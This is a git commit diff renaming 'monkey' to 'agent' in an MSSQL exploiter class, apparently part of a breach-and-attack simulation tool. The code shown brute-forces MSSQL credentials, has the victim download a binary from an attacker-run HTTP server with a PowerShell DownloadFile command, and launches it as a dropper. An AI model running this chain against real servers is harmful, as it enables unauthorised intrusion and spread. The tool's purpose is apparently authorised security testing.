Agent: Replace references to "monkey" with "agent" in MSSQLExploiter

This commit is contained in:
Mike Salvatore 2022-06-14 14:35:28 -04:00
parent 79fbd8b600
commit 7aca587964
1 changed files with 22 additions and 22 deletions


@ -33,7 +33,7 @@ class MSSQLExploiter(HostExploiter):
# Single quotes are escaped in SQL by using two of them. # Single quotes are escaped in SQL by using two of them.
# Example: 'It ain''t over ''til it''s over' # Example: 'It ain''t over ''til it''s over'
MONKEY_DOWNLOAD_COMMAND = ( AGENT_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
) )
@ -45,7 +45,7 @@ class MSSQLExploiter(HostExploiter):
self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
monkey_path_on_victim = get_agent_dst_path(self.host) agent_path_on_victim = get_agent_dst_path(self.host)
# Brute force to get connection # Brute force to get connection
creds = generate_identity_secret_pairs( creds = generate_identity_secret_pairs(
@ -67,8 +67,8 @@ class MSSQLExploiter(HostExploiter):
try: try:
self._create_temp_dir() self._create_temp_dir()
self._upload_monkey(monkey_path_on_victim) self._upload_agent(agent_path_on_victim)
self.run_monkey(monkey_path_on_victim) self.run_agent(agent_path_on_victim)
self._remove_temp_dir() self._remove_temp_dir()
except Exception as e: except Exception as e:
error_message = ( error_message = (
@ -148,17 +148,17 @@ class MSSQLExploiter(HostExploiter):
mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}" mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}"
self._run_mssql_command(mkdir_command) self._run_mssql_command(mkdir_command)
def _upload_monkey(self, monkey_path_on_victim: PureWindowsPath): def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
http_thread = self._start_monkey_server(monkey_path_on_victim) http_thread = self._start_agent_server(agent_path_on_victim)
self._write_download_command_to_batch_file(monkey_path_on_victim) self._write_download_command_to_batch_file(agent_path_on_victim)
self.run_payload_file() self.run_payload_file()
MSSQLExploiter._stop_monkey_server(http_thread) MSSQLExploiter._stop_agent_server(http_thread)
def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath): def _write_download_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath):
agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) http_path=self.agent_http_path, dst_path=str(agent_path_on_victim)
) )
self._write_command_to_batch_file(agent_download_command) self._write_command_to_batch_file(agent_download_command)
@ -177,32 +177,32 @@ class MSSQLExploiter(HostExploiter):
def run_payload_file(self): def run_payload_file(self):
self._run_mssql_command(str(self.payload_file_path)) self._run_mssql_command(str(self.payload_file_path))
def run_monkey(self, monkey_path_on_victim: PureWindowsPath): def run_agent(self, agent_path_on_victim: PureWindowsPath):
self._write_agent_launch_command_to_batch_file(monkey_path_on_victim) self._write_agent_launch_command_to_batch_file(agent_path_on_victim)
self.run_payload_file() self.run_payload_file()
def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim): def _write_agent_launch_command_to_batch_file(self, agent_path_on_victim):
agent_launch_command = self._get_monkey_launch_command(monkey_path_on_victim) agent_launch_command = self._build_agent_launch_command(agent_path_on_victim)
self._write_command_to_batch_file(agent_launch_command) self._write_command_to_batch_file(agent_launch_command)
def _get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath):
monkey_args = build_monkey_commandline( agent_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, agent_path_on_victim
) )
return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}" return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
def _remove_temp_dir(self): def _remove_temp_dir(self):
self._run_mssql_command(f"del {self.payload_file_path}") self._run_mssql_command(f"del {self.payload_file_path}")
self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}") self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}")
def _start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_repository self.host, str(agent_path_on_victim), self.agent_repository
) )
return http_thread return http_thread
@staticmethod @staticmethod
def _stop_monkey_server(http_thread): def _stop_agent_server(http_thread):
http_thread.stop() http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT) http_thread.join(LONG_REQUEST_TIMEOUT)